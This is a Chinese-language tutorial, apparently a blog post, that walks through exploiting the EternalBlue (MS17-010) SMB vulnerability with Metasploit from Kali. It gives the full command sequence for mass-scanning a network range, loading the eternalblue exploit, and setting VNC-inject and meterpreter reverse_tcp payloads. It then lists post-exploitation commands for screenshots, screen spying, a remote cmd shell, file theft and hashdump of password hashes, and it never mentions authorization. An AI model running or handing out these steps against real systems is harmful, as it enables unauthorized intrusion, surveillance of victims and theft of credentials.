永恒之蓝其实是利用了微软的MS17-010漏洞。MS17-010是Windows系统一个底层服务的漏洞,通过这个漏洞可以影响445端口。黑客就是通过在网络上扫描开放的445端口,然后把木马病毒植入被攻击电脑。
本次渗透测试在kali中进行
首先 扫描局域网存在漏洞主机
msfconsole #启动msf
use auxiliary/scanner/smb/smb_ms17_010 #加载ms_17_010模块
show options #查看配置
(这里可以看到RHOSTS后边的required为yes 所以必须设置,为no的则不必须)
set RHOSTS 192.168.0.0/16 #设置扫描网段 RHOSTS(RHOSTS表示多个ip)
(这里可以看到THREADS为1 速度太慢 我们设置成100)
set THREADS 100 #设置线程为100
run #启动
接下来就是等待扫描结果看看哪个可以利用
其次 进行攻击(另一个shell窗口中进行)
msfconsole #启动msf
search ms17_010 #搜索渗透攻击模块
(这里看到搜索到渗透攻击模块2个,但是他们是一样的)
use exploit/windows/smb/ms17_010_eternalblue #加载渗透攻击模块
show options #展示攻击载荷
(这里看到需要设置RHOST 将上边扫描到的可利用主机ip 设置为RHOST)
set RHOST [ip] #RHOST 仅一个ip
接下来是设置攻击载荷payload,不同的payload有不同的功能
#设置攻击载荷①
set payload windows/x64/vncinject/bind_tcp #用于屏幕监控
exploit
然后你就可以看到他的屏幕了
#设置攻击载荷②
set payload windows/x64/meterpreter/reverse_tcp
show options #查看所需配置
set LHOST [本机ip] #配置参数
exploit #进行攻击
**********此攻击载荷下有很多命令,不一一细说**************
********** 只说几个简单的 ***************
********** 截屏 screenshot ***************
********** 屏幕监控 run vnc (若对方电脑上有安全软件会不稳定或者失败)
********** 进入对方cmd shell *****************
********** 进入cmd之后命令可就多了 你懂得 **************
********** 下载文件 download filepath **************
********** 上传文件 upload 本机path 对方path *************
********** 获得密码hash hashdump ******************
***********************************************************
更多 更详细的内容请参照 http://helloeveryone.blog.51cto.com/6171143/1112040/